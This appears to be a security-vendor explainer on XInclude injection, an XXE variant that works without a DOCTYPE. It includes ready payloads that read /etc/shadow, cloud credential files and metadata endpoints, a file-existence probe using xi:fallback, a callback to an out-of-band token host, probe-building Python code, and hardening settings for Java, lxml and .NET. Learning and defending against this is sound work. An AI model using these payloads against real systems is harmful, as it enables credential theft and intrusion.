XInclude injection uses W3C XInclude elements to include files or URLs in XML documents without needing DOCTYPE, bypassing filters that only block classic XXE patterns.
TL;DR
- XInclude reads files and URLs through <xi:include> elements, bypassing filters checking for <!DOCTYPE
- <xi:include parse="text" href="file:///etc/passwd"/> reads files just like classic XXE, via a different mechanism
- Disabling DOCTYPE processing does not disable XInclude; also call setXIncludeAware(false) in Java
- href="http://169.254.169.254/" works via XInclude just like XXE SSRF
XInclude (XML Inclusions, W3C standard) is a document composition mechanism that allows XML documents to include content from other files or URLs using namespace-qualified XML elements rather than DTD entity declarations. When an XInclude-aware XML processor encounters <xi:include href="file:///etc/passwd" parse="text"/>, it fetches the specified URI and substitutes the element with the retrieved content. The effect is the same as classic XXE file disclosure, achieved through an entirely different mechanism.
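The substitution described above can be reproduced locally with Python's standard library. This is a minimal sketch, not a model of any particular production parser: it uses xml.etree.ElementInclude, whose default loader treats href as a plain file path, and the file name, file content, and function name expand_text_include are made up for illustration.

```python
import os
import tempfile
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude

XI_NS = "http://www.w3.org/2001/XInclude"


def expand_text_include(target_path: str) -> str:
    """Return the text of <productId> after XInclude expansion (hypothetical helper)."""
    doc = (
        f'<order xmlns:xi="{XI_NS}">'
        f'<productId><xi:include parse="text" href="{target_path}"/></productId>'
        f'</order>'
    )
    root = ET.fromstring(doc)       # no DOCTYPE anywhere in the document
    ElementInclude.include(root)    # explicit XInclude pass replaces xi:include
    return root.findtext("productId")


# Demo with a throwaway file standing in for a sensitive target.
with tempfile.TemporaryDirectory() as tmp:
    secret_path = os.path.join(tmp, "secret.txt")
    with open(secret_path, "w", encoding="utf-8") as fh:
        fh.write("db_password=hunter2")
    leaked = expand_text_include(secret_path)

print(leaked)
```

The file content ends up as ordinary element text, which is why any application that echoes or stores that element also echoes or stores the file.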
XInclude injection (CWE-827: Improper Control of Document Type Definition) applies when an attacker can inject XML content into a body position — element content, request body — but cannot control the DOCTYPE. It directly bypasses the most common XXE hardening pattern: disabling DOCTYPE processing. An application that blocks <!DOCTYPE declarations while leaving XInclude processing enabled is vulnerable to file disclosure and SSRF via the XInclude vector.
OWASP A05:2021 (Security Misconfiguration) applies because disabling XInclude is a separate parser setting from disabling DOCTYPE entities, and most hardening documentation focuses exclusively on the DOCTYPE vector. CVE-2025-31200 confirmed this defense gap in LibreOffice (CVSS 7.1): the document processor had DOCTYPE-based XXE blocked but still processed XInclude instructions, leading to file disclosure when malicious ODT files were opened.
The attack requires no DOCTYPE declaration. The payload is a pure XML element:
<!-- No DOCTYPE — bypasses DOCTYPE-checking filters entirely -->
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</root>
When embedded in an application's expected XML schema:
POST /api/order/validate HTTP/1.1
Host: app.example.com
Content-Type: application/xml

<order xmlns:xi="http://www.w3.org/2001/XInclude">
<productId>
<xi:include parse="text" href="file:///etc/passwd"/>
</productId>
<quantity>1</quantity>
</order>

HTTP/1.1 200 OK

{"productId": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n...", "quantity": 1}

<!-- Linux sensitive files -->
<xi:include parse="text" href="file:///etc/passwd"/>
<xi:include parse="text" href="file:///etc/shadow"/>
<xi:include parse="text" href="file:///proc/self/environ"/>
<xi:include parse="text" href="file:///var/www/html/wp-config.php"/>
<xi:include parse="text" href="file:///home/app/.aws/credentials"/>
<!-- Windows sensitive files -->
<xi:include parse="text" href="file:///C:/Windows/System32/drivers/etc/hosts"/>
<xi:include parse="text" href="file:///C:/inetpub/wwwroot/web.config"/>

<!-- Cloud metadata (same targets as classic XXE SSRF) -->
<xi:include parse="text" href="http://169.254.169.254/latest/meta-data/iam/security-credentials/"/>
<!-- GCP metadata -->
<xi:include parse="text" href="http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"/>
<!-- Internal services -->
<xi:include parse="text" href="http://127.0.0.1:6379/"/>

<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/app-secret.key">
<xi:fallback>FILE_NOT_FOUND</xi:fallback>
</xi:include>
</root>
If the response contains FILE_NOT_FOUND, the file does not exist. If it contains other content, the file was read. This enables blind file existence enumeration without OOB infrastructure.
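The fallback check above can be sketched as a pair of small helpers. The function names and the three result labels are hypothetical, and the classification assumes XInclude processing has already been confirmed on the endpoint: a parser that ignores xi:include entirely may still echo the fallback text as ordinary element content.

```python
from xml.sax.saxutils import quoteattr

XI_NS = "http://www.w3.org/2001/XInclude"
MARKER = "FILE_NOT_FOUND"


def build_fallback_probe(path: str, marker: str = MARKER) -> str:
    """Build an xi:include probe for an absolute path with an xi:fallback marker."""
    href = quoteattr("file://" + path)  # quoteattr adds the quotes and escapes
    return (
        f'<root xmlns:xi="{XI_NS}">'
        f'<xi:include parse="text" href={href}>'
        f'<xi:fallback>{marker}</xi:fallback>'
        f'</xi:include></root>'
    )


def classify_response(body: str, marker: str = MARKER) -> str:
    """Interpret a response body following the rule described in the text."""
    if marker in body:
        return "not_found"      # fallback content was used
    if body.strip():
        return "read"           # something other than the marker came back
    return "inconclusive"       # empty body: nothing can be concluded


probe = build_fallback_probe("/etc/app-secret.key")
print(probe)
```

Choosing a marker string that cannot plausibly occur in the target file keeps the "not_found" result unambiguous.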
<!-- Include another XML file as a subtree -->
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="xml" href="file:///etc/xml/catalog"/>
</root>
This includes the target file as parsed XML, merging it into the document tree. It only works if the target is valid XML. It is useful for reading Spring application context XML files, Maven POM files, and other XML configuration.
CVE-2025-31200 — LibreOffice ODT XInclude (CVSS 7.1)
LibreOffice implemented blocking for DOCTYPE-based XXE in ODT processing. However, the XInclude processing path was left enabled. An ODT file with an XInclude element pointing to file:///etc/passwd disclosed the file when a user opened or converted the document. This CVE affects LibreOffice in document processing pipelines — automated conversion services, email attachment processors, and document management systems. Patched in LibreOffice 25.2.3 and 24.8.7.
LibreOffice-class applications using Apache FOP (XSL-FO to PDF converter) were also confirmed vulnerable to XInclude injection in SVG content passed to the FOP processor, as Apache FOP supports XInclude by default in its XML processing pipeline.
CVE-2025-66516 — Apache Tika (XInclude component)
Beyond the XFA XXE vector, Apache Tika's document processing pipeline included XInclude-aware parsers for certain document types. OOB callbacks confirmed XInclude processing in addition to the primary XFA entity vector before the 3.2.2 patch.
HackerOne #293795 — Uberflip (XInclude escalation)
After confirming standard XXE, the researcher tested XInclude to verify it was also unprotected. The application's XML schema validator did not recognize xi:include elements as suspicious. Both attack vectors were confirmed independently. This illustrates that applications often have multiple simultaneous XXE surface areas.
If DOCTYPE-based XXE probes are blocked (400 with "DOCTYPE not allowed"), escalate to XInclude:
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="http://YOUR-TOKEN.oast.pro/xinclude-test"/>
</root>
Embed xi:include inside the application's expected document structure:
<!-- For an order API expecting <order><productId>...</productId></order> -->
<order xmlns:xi="http://www.w3.org/2001/XInclude">
<productId><xi:include parse="text" href="file:///proc/version"/></productId>
</order>
Test file existence via xi:fallback:
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/app.conf">
<xi:fallback>NOT_FOUND</xi:fallback>
</xi:include>
</root>
Test SSRF via XInclude with cloud metadata endpoint.
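The embedding step above can be sketched with the standard library: take a known-good request body, pick the element whose content is reflected or processed, and swap its content for an xi:include element. The helper name embed_xinclude and the sample order document are assumptions for illustration; the callback URL is the placeholder used earlier in this section.

```python
import xml.etree.ElementTree as ET

XI_NS = "http://www.w3.org/2001/XInclude"


def embed_xinclude(sample_xml: str, target_tag: str, href: str) -> str:
    """Replace the content of the first <target_tag> with an xi:include element."""
    ET.register_namespace("xi", XI_NS)  # serialize with the conventional xi: prefix
    root = ET.fromstring(sample_xml)
    target = root if root.tag == target_tag else root.find(f".//{target_tag}")
    if target is None:
        raise ValueError(f"element <{target_tag}> not found in sample document")
    target.text = None                  # drop the legitimate value
    for child in list(target):
        target.remove(child)
    ET.SubElement(target, f"{{{XI_NS}}}include", {"parse": "text", "href": href})
    return ET.tostring(root, encoding="unicode")


probe = embed_xinclude(
    "<order><productId>42</productId><quantity>1</quantity></order>",
    "productId",
    "http://YOUR-TOKEN.oast.pro/xinclude-test",
)
print(probe)
```

Building the probe from a valid sample keeps the rest of the document schema-conformant, so a rejection is more likely to be about the xi:include element itself than about a malformed request.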
Burp Suite Pro does not automatically test XInclude by default — custom payloads are required. Add <xi:include> payloads to the active scanner's custom insertion points.
Semgrep rule java.lang.security.audit.xxe includes checks for setXIncludeAware(true) and alerts on XInclude enablement.
BreachVex runs a dedicated XInclude probe after its standard XXE probing, using xi:include with out-of-band callback tokens. This probe runs independently of DOCTYPE-based probes and is triggered when DOCTYPE probes fail.
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
// Block DOCTYPE (blocks classic XXE)
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// ALSO disable XInclude — separate setting
dbf.setXIncludeAware(false); // critical — not implied by DOCTYPE disabling
DocumentBuilder db = dbf.newDocumentBuilder();

// SAXParserFactory: same pattern
SAXParserFactory spf = SAXParserFactory.newInstance();
spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
spf.setXIncludeAware(false); // must be explicit
SAXParser sp = spf.newSAXParser();

from lxml import etree
# VULNERABLE: running XInclude processing on untrusted content
parser = etree.XMLParser(resolve_entities=False)
root = etree.fromstring(xml_bytes, parser=parser)
# fromstring() returns an element; xinclude() lives on its ElementTree
root.getroottree().xinclude()  # processes xi:include even with resolve_entities=False
# SAFE — never call xinclude() on untrusted content
parser = etree.XMLParser(
resolve_entities=False,
no_network=True,
load_dtd=False,
)
tree = etree.fromstring(xml_bytes, parser=parser)
# Do NOT call xinclude() on attacker-controlled content

// .NET XmlReader: XInclude is not natively supported
// If using XInclude via third-party library (MVPXML, SaxonCS), ensure
// external file access is restricted:
var settings = new XmlReaderSettings {
DtdProcessing = DtdProcessing.Prohibit,
XmlResolver = null // also prevents XInclude external resource fetching
};
Defense gap pattern: Many hardening guides instruct developers to disable DOCTYPE processing and consider XXE fixed. XInclude is a separate W3C standard using a different code path. CVE-2025-31200 (LibreOffice) and the Batik/FOP attack surface demonstrate that blocking DOCTYPE while leaving XInclude enabled leaves a complete alternative file-read vector active. Always configure both.
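As a defense-in-depth complement to the parser settings, input can also be checked for XInclude elements before it reaches an XInclude-aware component. The sketch below matches on the namespace URI rather than the xi: prefix, because the prefix is chosen by whoever writes the document. The function name contains_xinclude is hypothetical, and the standard-library parser used here has its own limits with hostile input, so this is an illustration of the check and not a replacement for disabling XInclude in the parser.

```python
import xml.etree.ElementTree as ET

XI_NS = "http://www.w3.org/2001/XInclude"


def contains_xinclude(xml_text: str) -> bool:
    """Return True if any element belongs to the XInclude namespace."""
    root = ET.fromstring(xml_text)
    prefix = f"{{{XI_NS}}}"  # ElementTree expands names to {namespace}local
    return any(
        isinstance(el.tag, str) and el.tag.startswith(prefix)
        for el in root.iter()
    )


conventional = (
    f'<root xmlns:xi="{XI_NS}">'
    '<xi:include parse="text" href="file:///etc/passwd"/></root>'
)
renamed = (
    f'<root xmlns:inc="{XI_NS}">'
    '<inc:include parse="text" href="file:///etc/passwd"/></root>'
)
benign = "<order><productId>42</productId></order>"

print(contains_xinclude(conventional), contains_xinclude(renamed), contains_xinclude(benign))
```

A filter that searches the raw text for the string "xi:include" would miss the second document, which is why the comparison is done on expanded names.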
XInclude (XML Inclusions) is a W3C standard that allows XML documents to compose themselves by including content from other files or URLs using xi:include elements. Unlike external DTD entities, XInclude does not require a DOCTYPE declaration — it uses namespace-qualified XML elements. When an application processes XML containing xi:include href='file:///etc/passwd' parse='text', the XML processor fetches and inlines the file content. An attacker who can inject XML content (but not control the DOCTYPE) can use XInclude to read files.
Classic XXE requires a DOCTYPE declaration and external entity definitions: <!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file://...'>]>. XInclude uses XML elements in the document body: <xi:include xmlns:xi='http://www.w3.org/2001/XInclude' parse='text' href='file:///etc/passwd'/>. No DOCTYPE is needed. This bypasses defenses that check for <!DOCTYPE in input or that disable DOCTYPE processing while leaving XInclude enabled. CWE-827 (Improper Control of Document Type Definition) covers XInclude, distinct from CWE-611 for classic XXE.
XInclude injection applies when: (1) the attacker can inject XML into a body position (element content, request body) but cannot control the document's DOCTYPE; (2) the application blocks DOCTYPE declarations but processes XInclude; (3) the parser has DOCTYPE disabled but XInclude awareness enabled (common, because they are separate settings). Classic XXE applies when the attacker controls the full XML document including the DOCTYPE. In practice, many hardening guides focus only on DOCTYPE and omit XInclude.
CVE-2025-31200 (LibreOffice ODT, CVSS 7.1) is the clearest recent example. LibreOffice rejected DOCTYPE-based XXE payloads in ODT files but still processed XInclude instructions in the document XML. An ODT with xi:include href='file:///etc/passwd' parse='text' disclosed the file when the document was opened or converted. Patched in LibreOffice 25.2.3 and 24.8.7. This CVE demonstrates the 'defense gap': hardening against one technique without covering the related one.
xi:include has two modes: parse='text' reads the target file as plain text and includes it as a text node — this works for any file including binary content (though binary may cause encoding issues). parse='xml' fetches and parses the target as an XML document, then merges it into the including document's tree. For file disclosure, parse='text' is more reliable because it reads the raw file content without XML parsing. parse='xml' only works if the target file is valid XML.
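The difference between the two modes can be observed with Python's xml.etree.ElementInclude. This is a rough sketch under simplifying assumptions: the default loader treats href as a local file path, and the two temporary files and the helper include_file are stand-ins invented for the demonstration.

```python
import os
import tempfile
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude

XI_NS = "http://www.w3.org/2001/XInclude"


def include_file(path: str, mode: str) -> ET.Element:
    """Expand a single xi:include of `path` using parse=`mode`; return the root."""
    doc = f'<root xmlns:xi="{XI_NS}"><xi:include parse="{mode}" href="{path}"/></root>'
    root = ET.fromstring(doc)
    ElementInclude.include(root)
    return root


with tempfile.TemporaryDirectory() as tmp:
    xml_path = os.path.join(tmp, "context.xml")
    txt_path = os.path.join(tmp, "passwd.txt")
    with open(xml_path, "w", encoding="utf-8") as fh:
        fh.write("<beans><bean id='ds'/></beans>")
    with open(txt_path, "w", encoding="utf-8") as fh:
        fh.write("root:x:0:0:root:/root:/bin/bash\n")

    # parse="xml": the target becomes a subtree of the including document.
    merged_tag = include_file(xml_path, "xml")[0].tag

    # parse="text": the target becomes plain character data.
    as_text = include_file(txt_path, "text").text

    # parse="xml" on a non-XML target fails instead of disclosing content.
    try:
        include_file(txt_path, "xml")
        xml_mode_failed = False
    except ET.ParseError:
        xml_mode_failed = True

print(merged_tag, repr(as_text), xml_mode_failed)
```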
XInclude can also be used for SSRF. xi:include href='http://internal-service/' parse='text' makes the XML processor issue an HTTP request to the specified URL and includes the response as text content. This is the same SSRF-via-XML mechanism as classic XXE's http:// SYSTEM entity, but implemented via XInclude. The SSRF targets are identical: AWS IMDS, internal APIs, Kubernetes API server, Redis. The XInclude SSRF is triggered even on parsers that have DOCTYPE-based external entities disabled.
If DOCTYPE-based entity probes return 400 with 'DOCTYPE not allowed', try XInclude: submit <root xmlns:xi='http://www.w3.org/2001/XInclude'><xi:include parse='text' href='file:///etc/passwd'/></root>. If the endpoint processes your XML body content (you control element content), embed the xi:include as a child element. If file contents appear in the response or an OOB callback fires, XInclude is enabled and unprotected.
Disabling DOCTYPE processing does not disable XInclude; the two are controlled by separate parser settings. In Java JAXP: disabling DOCTYPE (setFeature disallow-doctype-decl=true) does NOT disable XInclude, so you must also call setXIncludeAware(false). In lxml: setting load_dtd=False does not disable XInclude; use etree.XMLParser(load_dtd=False, no_network=True) and avoid calling xinclude(). In libxml2: leaving XML_PARSE_NOENT unset (the flag enables entity substitution) has no effect on XInclude, which is controlled separately by XML_PARSE_XINCLUDE. Both must be configured independently.
XInclude supports an xi:fallback element: if the primary xi:include href fails (file not found, network error), the content of xi:fallback is used instead. An attacker can use this for error-based file path enumeration: include a file expected to exist, and use fallback to detect when it doesn't. This enables blind path traversal to enumerate filesystem layout. Example: <xi:include href='file:///etc/app-secret.key'><xi:fallback>FILE_NOT_FOUND</xi:fallback></xi:include>.
Most standard XXE scanners (Burp Suite Pro, XXEinjector) do not automatically test XInclude. XInclude detection requires custom payloads. Semgrep rules for 'XInclude' and 'setXIncludeAware' detect configuration issues in Java code. Manual testing remains the most reliable approach: submit xi:include payloads with Interactsh tokens and monitor for OOB callbacks. BreachVex tests XInclude separately from its main XXE probing, using a dedicated XInclude probe that runs after DOCTYPE-based probes complete.
Commonly affected processors include: Java SAX/DOM parsers with setXIncludeAware(true) (not the default, but commonly set for DITA/DocBook processing); Python lxml when the tree is built and xinclude() is then called explicitly; libxslt when processing XSLT that uses the document() function with XInclude-processed sources; LibreOffice document processors (pre-patch CVE-2025-31200); Apache Batik SVG renderer (SVG 1.1 supports XLink, which overlaps with XInclude processing); and Apache FOP (XSL-FO to PDF processor).